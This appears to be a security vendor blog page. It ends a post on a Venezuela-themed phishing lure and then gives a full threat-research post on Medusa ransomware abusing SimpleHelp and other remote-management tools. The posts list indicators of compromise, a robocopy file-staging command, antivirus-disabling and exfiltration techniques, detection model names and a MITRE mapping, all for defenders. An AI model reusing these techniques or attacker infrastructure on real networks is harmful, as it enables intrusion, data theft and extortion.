Threat groups have long used geopolitical issues and other high-profile events to make malicious content appear more credible or urgent. Since the onset of the war in Ukraine, organizations have been repeatedly targeted with spear-phishing emails using subject lines related to the ongoing conflict, including references to prisoners of war [1]. Similarly, the Chinese threat group Mustang Panda frequently uses this tactic to deploy backdoors, using lures related to the Ukrainian war, conventions on Tibet [2], the South China Sea [3], and Taiwan [4].  

The activity described in this blog shares similarities with previous Mustang Panda campaigns, including the use of a current-events archive, a directory created in ProgramData with a legitimate executable used to load a malicious DLL and run registry keys used for persistence. While there is an overlap of tactics, techniques and procedures (TTPs), there is insufficient information available to confidently attribute this activity to a specific threat group. Users should remain vigilant, especially when opening email attachments.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

172.81.60[.]97
8f81ce8ca6cdbc7d7eb10f4da5f470c6 - US now deciding what's next for Venezuela.zip
722bcd4b14aac3395f8a073050b9a578 - Maduro to be taken to New York.exe
aea6f6edbbbb0ab0f22568dcb503d731  - kugou.dll

References

[1] https://cert.gov.ua/article/6280422  

[2] https://www.ibm.com/think/x-force/hive0154-mustang-panda-shifts-focus-tibetan-community-deploy-pubload-backdoor

[3] https://www.ibm.com/think/x-force/hive0154-targeting-us-philippines-pakistan-taiwan

[4] https://www.ibm.com/think/x-force/hive0154-targeting-us-philippines-pakistan-taiwan

Continue reading
About the author
Tara Gould
Malware Research Lead

Blog

/

Network

/

January 9, 2026

Under Medusa’s Gaze: How Darktrace Uncovers RMM Abuse in Ransomware Campaigns

madusa ransomwareDefault blog imageDefault blog image

What is Medusa Ransomware in 2025?

In 2025, the Medusa Ransomware-as-a-Service (RaaS) emerged as one of the top 10 most active ransomware threat actors [1]. Its growing impact prompted a joint advisory from the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) [3]. As of January 2026, more than 500 organizations have fallen victim to Medusa ransomware [2].

Darktrace previously investigated Medusa in a 2024 blog, but the group’s rapid expansion and new intelligence released in late 2025 has lead Darktrace’s Threat Research team to  investigate further. Recent findings include Microsoft’s research on Medusa actors exploiting a vulnerability in Fortra’s GoAnywhere MFT License Servlet (CVE-2025-10035)[4] and Zencec’s report on Medusa’s abuse of flaws in SimpleHelp’s remote support software (CVE-2024-57726, CVE-2024-57727, CVE-2024-57728) [5].

Reports vary on when Medusa first appeared in the wild. Some sources mention June 2021 as the earliest sightings, while others point to late 2022, when its developers transitioned to the RaaS model, as the true beginning of its operation [3][11].

Madusa Ransomware history and background

The group behind Medusa is known by several aliases, including Storm-1175 and Spearwing [4] [7]. Like its mythological namesake, Medusa has many “heads,” collaborating with initial access brokers (IABs) and, according to some evidence, affiliating with Big Game Hunting (BGH) groups such as Frozen Spider, as well as the cybercriminal group UNC7885 [3][6][13].

Use of Cyrillic in its scripts, activity on Russian-language cybercrime forums, slang unique to Russian criminal subcultures, and avoidance of targets in Commonwealth of Independent States (CIS) countries suggest that Medusa operates from Russia or an allied state [11][12].

Medusa ransomware should not be confused with other similarly named malware, such as the Medusa Android Banking Trojan, the Medusa Botnet/Medusa Stealer, or MedusaLocker ransomware. It is easily distinguishable from these variants because it appends the extension .MEDUSA to encrypted files and drops the ransom note !!!READ_ME_MEDUSA!!!.txt on compromised systems [8].

Who does Madusa Ransomware target?

The group appears to show little restraint, indiscriminately attacking organizations across all sectors, including healthcare, and is known to employ triple extortion tactics whereby sensitive data is encrypted, victims are threatened with data leaks, and additional pressure is applied through DDoS attacks or contacting the victim’s customers, rather than the more common double extortion model [13].

Madusa Ransomware TTPs

To attain initial access, Medusa actors typically purchase access to already compromised devices or accounts via IABs that employ phishing, credential stuffing, or brute-force attacks, and also target vulnerable or misconfigured Internet-facing systems.

In addition to the GoAnywhere MFT and SimpleHelp RMM flaws, other vulnerabilities exploited in Medusa attacks include ConnectWise ScreenConnect RMM (CVE-2024-1709), Microsoft Exchange Server (CVE-2021-34473, also known as ProxyShell), and Fortinet Enterprise Management Servers (CVE-2023-48788) [18][19][20][21][24][25].

Darktrace’s Coverage of Medusa Ransomware

Between December 2023 and November 2025, Darktrace observed multiple cases of file encryption related to Medusa ransomware across its customer base. When enabled, Darktrace’s Autonomous Response capability intervened early in the attack chain, blocking malicious activity before file encryption could begin.

Some of the affected were based in Europe, the Middle East and Africa (EMEA), others in the Americas (AMS), and the remainder in the Asia-Pacific and Japan region. The most impacted sectors were financial services and the automotive industry, followed by healthcare, and finally organizations in arts, entertainment and recreation, ICT, and manufacturing.

Remote Monitoring and Management (RMM) tool abuse

In most customer environments where Medusa file encryption attempts were observed, and in one case where the compromise was contained before encryption, unusual external HTTP connections associated with JWrapper were also detected. JWrapper is a legitimate tool designed to simplify the packaging, distribution, and management of Java applications, enabling the creation of executables that run across different operating systems. Many of the destination IP addresses involved in this activity were linked to SimpleHelp servers or associated with Atera.

Medusa actors appear to favor RMM tools such as SimpleHelp. Unpatched or misconfigured SimpleHelp RMM servers can serve as an initial access vector to the victims’ infrastructure.  After gaining access to SimpleHelp management servers, the threat actors edit server configuration files to redirect existing SimpleHelp RMM agents to communicate with unauthorized servers under their control.

The SimpleHelp tool is not only used for command-and-control (C2) and enabling persistence but is also observed during lateral movement within the network, downloading additional attack tools, data exfiltration, and even ransomware binary execution. Other legitimate remote access tools abused by Medusa in a similar manner to evade detection include Atera, AnyDesk, ScreenConnect, eHorus, N-able, PDQ Deploy/Inventory, Splashtop, TeamViewer, NinjaOne, Navicat, and MeshAgent [4][5][15][16][17].

Data exfiltration

Another correlation among Darktrace customers affected by Medusa was observed during the data exfiltration phase. In several environments, data was exfiltrated to the endpoints erp.ranasons[.]com or pruebas.pintacuario[.]mx (143.110.243[.]154, 144.217.181[.]205) over ports 443, 445, and 80. erp.ranasons[.]com was seemingly active between November 2024 and September 2025, while pruebas.pintacuario[.]mx was seen from November 2024 to March 2025. Evidence suggests that pruebas.pintacuario[.]mx previously hosted a SimpleHelp server [22][23].

Apart from RMM tools, Medusa is also known to use Rclone and Robocopy for data exfiltration [3][19]. During one Medusa compromise detected in mid-2024, the customer’s data was exfiltrated to external destinations associated with the Ngrok proxy service using an SSH-2.0-rclone client.

Medusa Compromise Leveraging SimpleHelp

In Q4 2025, Darktrace assisted a European company impacted by Medusa ransomware. The organization had partial Darktrace / NETWORK coverage and had configured Darktrace’s Autonomous Response capability to require manual confirmation for all actions. Despite these constraints, data received through the customer’s security integration with CrowdStrike Falcon enabled Darktrace analysts to reconstruct the attack chain, although the initial access vector remains unclear due to limited visibility.

In late September 2025, a device out of the scope of Darktrace's visibility began scanning the network and using RDP, NTLM/SMB, DCE_RPC, and PowerShell for lateral movement.

CrowdStrike “Defense Evasion: Disable or Modify Tools” alerts related to a suspicious driver (c:\windows\[0-9a-b]{4}.exe) and a PDQ Deploy executable (share=\\<device_hostname>\ADMIN$ file=AdminArsenal\PDQDeployRunner\service-1\exec\[0-9a-b]{4}.exe) suggest that the attackers used the Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes on network devices, leveraging tools such as KillAV or AbyssWorker along with the PDQ Software Deployment solution [19][26].

A few hours later, Darktrace observed the same device that had scanned the network writing Temp\[a-z]{2}.exe over SMB to another device on the same subnet. According to data from the CrowdStrike alert, this executable was linked to an RMM application located at C:\Users\<compromised_user>\Documents\[a-z]{2}.exe. The same compromised user account later triggered a CrowdStrike “Command and Control: Remote Access Tools” alert when accessing C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-[0-9]{11}\JWrapperTemp-[0-9]{10}-[0-9]{1}-app\bin\windowslauncher.exe [27].

An executable file associated with the SimpleHelp RMM tool being written to other devices using the SMB protocol, as detected by Darktrace.
Figure 1: An executable file associated with the SimpleHelp RMM tool being written to other devices using the SMB protocol, as detected by Darktrace.

Soon after, the destination device and multiple other network devices began establishing connections to 31.220.45[.]120 and 213.183.63[.]41, both of which hosted malicious SimpleHelp RMM servers. These C2 connections continued for more than 20 days after the initial compromise.

CrowdStrike integration alerts for the execution of robocopy . "c:\windows\\" /COPY:DT /E /XX /R:0 /W:0 /NP /XF RunFileCopy.cmd /IS /IT commands on several Windows servers, suggested that this utility was likely used to stage files in preparation for data exfiltration [19].

Around two hours later, Darktrace detected another device connecting to the attacker’s SimpleHelp RMM servers. This internal server had ‘doc’ in its hostname, indicating it was likely a file server. It was observed downloading documents from another internal server over SMB and uploading approximately 70 GiB of data to erp.ranasons[.]com (143.110.243[.]154:443).

Data uploaded to erp.ranasons[.]com and the number of model alerts from the exfiltrating device, represented by yellow and orange dots.
Figure 2: Data uploaded to erp.ranasons[.]com and the number of model alerts from the exfiltrating device, represented by yellow and orange dots.

Darktrace’s Cyber AI Analyst autonomously investigated the unusual connectivity, correlating the separate C2 and data exfiltration events into a single incident, providing greater visibility into the ongoing attack.

Cyber AI Analyst identified a file server making C2 connections to an attacker-controlled SimpleHelp server (213.183.63[.]41) and exfiltrating data to erp.ranasons[.]com.
Figure 3: Cyber AI Analyst identified a file server making C2 connections to an attacker-controlled SimpleHelp server (213.183.63[.]41) and exfiltrating data to erp.ranasons[.]com.
The same file server that connected to 213.183.63[.]41 and exfiltrated data to erp.ranasons[.]com was also observed attempting to connect to an IP address associated with Moscow, Russia (193.37.69[.]154:7070).
Figure 4: The same file server that connected to 213.183.63[.]41 and exfiltrated data to erp.ranasons[.]com was also observed attempting to connect to an IP address associated with Moscow, Russia (193.37.69[.]154:7070).

One of the devices connecting to the attacker's SimpleHelp RMM servers was also observed downloading 35 MiB from [0-9]{4}.filemail[.]com. Filemail, a legitimate file-sharing service, has reportedly been abused by Medusa actors to deliver additional malicious payloads [11].

A device controlled remotely via SimpleHelp downloading additional tooling from the Filemail file-sharing service.
Figure 5: A device controlled remotely via SimpleHelp downloading additional tooling from the Filemail file-sharing service.

Finally, integration alerts related to the ransomware binary, such as c:\windows\system32\gaze.exe and <device_hostname>\ADMIN$ file=AdminArsenal\PDQDeployRunner\service-1\exec\gaze.exe, along with “!!!READ_ME_MEDUSA!!!.txt” ransom notes were observed on network devices. This indicates that file encryption in this case was most likely carried out directly on the victim hosts rather than via the SMB protocol [3].

Conclusion

Threat actors, including nation-state actors and ransomware groups like Medusa, have long abused legitimate commercial RMM tools, typically used by system administrators for remote monitoring, software deployment, and device configuration, instead of relying on remote access trojans (RATs).

Attackers employ existing authorized RMM tools or install new remote administration software to enable persistence, lateral movement, data exfiltration, and ingress tool transfer. By mimicking legitimate administrative behavior, RMM abuse enables attackers to evade detection, as security software often implicitly trusts these tools, allowing attackers to bypass traditional security controls [28][29][30].

To mitigate such risks, organizations should promptly patch publicly exposed RMM servers and adopt anomaly-based detection solutions, like Darktrace / NETWORK, which can distinguish legitimate administrative activity from malicious behavior, applying rapid response measures through its Autonomous Response capability to stop attacks in their tracks.

Darktrace delivers comprehensive network visibility and Autonomous Response capabilities, enabling real-time detection of anomalous activity and rapid mitigation, even if an organization fall under Medusa’s gaze.

Credit to Signe Zaharka (Principal Cyber Analyst) and Emma Foulger (Global Threat Research Operations Lead

Edited by Ryan Traill (Analyst Content Lead)

Appendices

List of Indicators of Compromise (IoCs)

IoC - Type - Description + Confidence + Time Observed

185.108.129[.]62 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - March 7, 2023

185.126.238[.]119 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - November 26-27, 2024

213.183.63[.]41 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - November 28, 2024 - Sep 30, 2025

213.183.63[.]42 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - July 4 -9 , 2024

31.220.45[.]120 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - September 12 - Oct 20 , 2025

91.92.246[.]110 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - May 24, 2024

45.9.149[.]112:15330 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - June 21, 2024

89.36.161[.]12 IP address Malicious SimpleHelp server observed during Medusa attacks (High confidence) - June 26-28, 2024

193.37.69[.]154:7070 IP address Suspicious RU IP seen on a device being controlled via SimpleHelp and exfiltrating data to a Medusa related endpoint - September 30 - October 20, 2025

erp.ranasons[.]com·143.110.243[.]154 Hostname Data exfiltration destination - November 27, 2024 - September 30, 2025

pruebas.pintacuario[.]mx·144.217.181[.]205 - Hostname Data exfiltration destination - November 27, 2024  -  March 26, 2025

lirdel[.]com · 44.235.83[.]125/a.msi (1b9869a2e862f1e6a59f5d88398463d3962abe51e19a59) File & hash Atera related file downloaded with PowerShell - June 20, 2024

wizarr.manate[.]ch/108.215.180[.]161:8585/$/1dIL5 File Suspicious file observed on one of the devices exhibiting unusual activity during a Medusa compromise - February 28, 2024

!!!READ_ME_MEDUSA!!!.txt" File - Ransom note

*.MEDUSA - File extension        File extension added to encrypted files

gaze.exe – File - Ransomware binary

Darktrace Model Coverage

Darktrace / NETWORK model detections triggered during connections to attacker controlled SimpleHelp servers:

Anomalous Connection/Anomalous SSL without SNI to New External

Anomalous Connection/Multiple Connections to New External UDP Port

Anomalous Connection/New User Agent to IP Without Hostname

Anomalous Connection/Rare External SSL Self-Signed

Anomalous Connection/Suspicious Self-Signed SSL

Anomalous File/EXE from Rare External Location

Anomalous Server Activity/Anomalous External Activity from Critical Network Device

Anomalous Server Activity/New User Agent from Internet Facing System

Anomalous Server Activity/Outgoing from Server

Anomalous Server Activity/Rare External from Server

Compromise/High Volume of Connections with Beacon Score

Compromise/Large Number of Suspicious Failed Connections

Compromise/Ransomware/High Risk File and Unusual SMB

Device/New User Agent

Unusual Activity/Unusual External Data to New Endpoint

Unusual Activity/Unusual External Data Transfer

Darktrace / NETWORK Model Detections during the September/October 2025 Medusa attack:

Anomalous Connection / Data Sent to Rare Domain

Anomalous Connection / Download and Upload

Anomalous Connection / Low and Slow Exfiltration

Anomalous Connection / New User Agent to IP Without Hostname

Anomalous Connection / Uncommon 1 GiB Outbound

Anomalous Connection / Unusual Admin RDP Session

Anomalous Connection / Unusual Incoming Long Remote Desktop Session

Anomalous Connection / Unusual Long SSH Session

Anomalous File / EXE from Rare External Location

Anomalous File / Internal/Unusual Internal EXE File Transfer

Anomalous Server Activity / Anomalous External Activity from Critical Network Device

Anomalous Server Activity / Outgoing from Server

Anomalous Server Activity / Rare External from Server

Compliance / Default Credential Usage

Compliance / High Priority Compliance Model Alert

Compliance / Outgoing NTLM Request from DC

Compliance / Possible Unencrypted Password File On Server

Compliance / Remote Management Tool On Server

Compromise / Large Number of Suspicious Failed Connections

Compromise / Large Number of Suspicious Successful Connections

Compromise / Ransomware/High Risk File and Unusual SMB

Compromise / Suspicious Beaconing Behaviour

Compromise / Suspicious HTTP and Anomalous Activity

Compromise / Sustained SSL or HTTP Increase

Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

Device / ICMP Address Scan

Device / Increase in New RPC Services

Device / Initial Attack Chain Activity

Device / Large Number of Model Alert

Device / Large Number of Model Alerts from Critical Network Device

Device / Lateral Movement and C2 Activity

Device / Multiple C2 Model Alert

Device / Network Scan

Device / Possible SMB/NTLM Reconnaissance

Device / Spike in LDAP Activity

Device / Suspicious Network Scan Activity

Device / Suspicious SMB Scanning Activity

Security Integration / High Severity Integration Incident

Security Integration / Low Severity Integration Incident

Unusual Activity / Enhanced Unusual External Data Transfer

Unusual Activity / Internal Data Transfer

Unusual Activity / Unusual External Activity

Unusual Activity / Unusual External Data to New Endpoint

Unusual Activity / Unusual External Data Transfer

User / New Admin Credentials on Server

Autonomous Response Actions

Antigena / Network/External Threat/Antigena File then New Outbound Block

Antigena / Network/External Threat/Antigena Ransomware Block

Antigena / Network/External Threat/Antigena Suspicious Activity Block

Antigena / Network/External Threat/Antigena Suspicious File Block

Antigena / Network/Insider Threat/Antigena Internal Anomalous File Activity

Antigena / Network/Insider Threat/Antigena Internal Data Transfer Block

Antigena / Network/Insider Threat/Antigena Large Data Volume Outbound Block

Antigena / Network/Insider Threat/Antigena Network Scan Block

Antigena / Network/Insider Threat/Antigena Unusual Privileged User Activities Block

Antigena / Network/Significant Anomaly/Antigena Alerts Over Time Block

Antigena / Network/Significant Anomaly/Antigena Controlled and Model Alert

Antigena / Network/Significant Anomaly/Antigena Enhanced Monitoring from Server Block

Antigena / Network/Significant Anomaly/Antigena Significant Server Anomaly Block

Antigena / Network/Significant Anomaly/Repeated Antigena Alerts

MITRE ATT&CK Mapping

Technique Name, Tactic, ID, Sub-Technique

Application Layer Protocol , COMMAND AND CONTROL , T1071

Automated Collection , COLLECTION , T1119

Automated Exfiltration , EXFILTRATION , T1020

Brute Force , CREDENTIAL ACCESS , T1110

Client Configurations , RECONNAISSANCE , T1592.004 , T1592

Cloud Accounts , DEFENSE EVASION ,  PERSISTENCE ,  PRIVILEGE ESCALATION ,  INITIAL ACCESS , T1078.004 , T1078

Command-Line Interface , EXECUTION ICS , T0807

Credential Stuffing , CREDENTIAL ACCESS , T1110.004 , T1110

Data Encrypted for Impact , IMPACT , T1486

Data from Network Shared Drive , COLLECTION , T1039

Data Obfuscation , COMMAND AND CONTROL , T1001

Data Staged , COLLECTION , T1074

Data Transfer Size Limits , EXFILTRATION , T1030

Default Accounts , DEFENSE EVASION ,  PERSISTENCE ,  PRIVILEGE ESCALATION ,  INITIAL ACCESS , T1078.001 , T1078

Default Credentials , LATERAL MOVEMENT ICS , T0812

Distributed Component Object Model , LATERAL MOVEMENT , T1021.003 , T1021

Drive-by Compromise , INITIAL ACCESS ICS , T0817

Drive-by Compromise , INITIAL ACCESS , T1189

Email Collection , COLLECTION , T1114

Exfiltration Over Alternative Protocol , EXFILTRATION , T1048

Exfiltration Over C2 Channel , EXFILTRATION , T1041

Exfiltration to Cloud Storage , EXFILTRATION , T1567.002 , T1567

Exploit Public-Facing Application , INITIAL ACCESS , T1190

Exploitation for Privilege Escalation , PRIVILEGE ESCALATION , T0890

Exploitation of Remote Services , LATERAL MOVEMENT , T1210

Exploits , RESOURCE DEVELOPMENT , T1588.005 , T1588

File and Directory Discovery , DISCOVERY , T1083

File Deletion , DEFENSE EVASION , T1070.004 , T1070

Graphical User Interface , EXECUTION ICS , T0823

Ingress Tool Transfer , COMMAND AND CONTROL , T1105

Lateral Tool Transfer , LATERAL MOVEMENT , T1570

LLMNR/NBT-NS Poisoning and SMB Relay , CREDENTIAL ACCESS ,  COLLECTION , T1557.001 , T1557

Malware , RESOURCE DEVELOPMENT , T1588.001 , T1588

Network Service Scanning , DISCOVERY , T1046

Network Share Discovery , DISCOVERY , T1135

Non-Application Layer Protocol , COMMAND AND CONTROL , T1095

Non-Standard Port , COMMAND AND CONTROL , T1571

One-Way Communication , COMMAND AND CONTROL , T1102.003 , T1102

Pass the Hash , DEFENSE EVASION ,  LATERAL MOVEMENT , T1550.002 , T1550

Password Cracking , CREDENTIAL ACCESS , T1110.002 , T1110

Password Guessing , CREDENTIAL ACCESS , T1110.001 , T1110

Password Spraying , CREDENTIAL ACCESS , T1110.003 , T1110

Program Download , LATERAL MOVEMENT ICS , T0843

Program Upload , COLLECTION ICS , T0845

Remote Access Software , COMMAND AND CONTROL , T1219

Remote Desktop Protocol , LATERAL MOVEMENT , T1021.001 , T1021

Remote System Discovery , DISCOVERY , T1018

Scanning IP Blocks , RECONNAISSANCE , T1595.001 , T1595

Scheduled Transfer , EXFILTRATION , T1029

Spearphishing Attachment , INITIAL ACCESS ICS , T0865

Standard Application Layer Protocol , COMMAND AND CONTROL ICS , T0869

Supply Chain Compromise , INITIAL ACCESS ICS , T0862

User Execution , EXECUTION ICS , T0863

Valid Accounts , DEFENSE EVASION ,  PERSISTENCE ,  PRIVILEGE ESCALATION ,  INITIAL ACCESS , T1078

Valid Accounts , PERSISTENCE ICS ,  LATERAL MOVEMENT ICS , T0859

Vulnerabilities , RESOURCE DEVELOPMENT , T1588.006 , T1588

Vulnerability Scanning , RECONNAISSANCE , T1595.002 , T1595

Web Protocols , COMMAND AND CONTROL , T1071.001 , T1071

References

1. https://www.intel471.com/blog/threat-hunting-case-study-medusa-ransomware

2. https://www.ransomware.live/group/medusa

3. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a

4. https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/

5. https://zensec.co.uk/blog/how-rmm-abuse-fuelled-medusa-dragonforce-attacks/

6. https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/medusa-ransomware-group/

7. https://cyberpress.org/medusa-ransomware-attacks-spike-42/

8. https://blog.barracuda.com/2025/02/25/medusa-ransomware-and-its-cybercrime-ecosystem

10. https://www.cyberdaily.au/security/10021-more-monster-than-myth-unpacking-the-medusa-ransomware-operation

11. https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/

12. https://www.bitdefender.com/en-us/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence

13. https://redpiranha.net/news/medusa-ransomware-everything-you-need-know

14.  https://www.theregister.com/2025/03/13/medusa_ransomware_infects_300_critical/

15. https://www.s-rminform.com/latest-thinking/cyber-threat-advisory-medusa-and-the-simplehelp-vulnerability

16. https://nagomisecurity.com/medusa-ransomware-us-cert-alert

17. https://arcticwolf.com/resources/blog/arctic-wolf-observes-campaign-exploiting-simplehelp-rmm-software-for-initial-access/

18. https://securityboulevard.com/2025/04/medusa-ransomware-inside-the-2025-resurgence-of-one-of-the-internets-most-aggressive-threats/

19. https://thehackernews.com/2025/03/medusa-ransomware-hits-40-victims-in.html

20.  https://www.quorumcyber.com/threat-intelligence/critical-alert-medusa-ransomware-threat-highlighted-by-fbi-cisa-and-ms-isac/

21. https://brandefense.io/blog/stone-gaze-in-depth-analysis-of-medusa-ransomware/

22. https://www.darktrace.com/ja/blog/2025-cyber-threat-landscape-darktraces-mid-year-review

23. https://www.joesandbox.com/analysis/1576447/0/html

24. https://blog.barracuda.com/2025/02/25/medusa-ransomware-and-its-cybercrime-ecosystem

25. https://shassit.mit.edu/news/medusa-ransomware-attacks-on-gmail/

26. https://thehackernews.com/2025/03/medusa-ransomware-uses-malicious-driver.html

27. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-163a

28. https://www.catonetworks.com/blog/cato-ctrl-investigation-of-rmm-tools/

29. https://redcanary.com/threat-detection-report/trends/rmm-tools/

30. https://www.proofpoint.com/us/blog/threat-insight/remote-monitoring-and-management-rmm-tooling-increasingly-attackers-first-choice

Continue reading
About the author
Signe Zaharka
Principal Cyber Analyst
Your data. Our AI.
Elevate your network security with Darktrace AI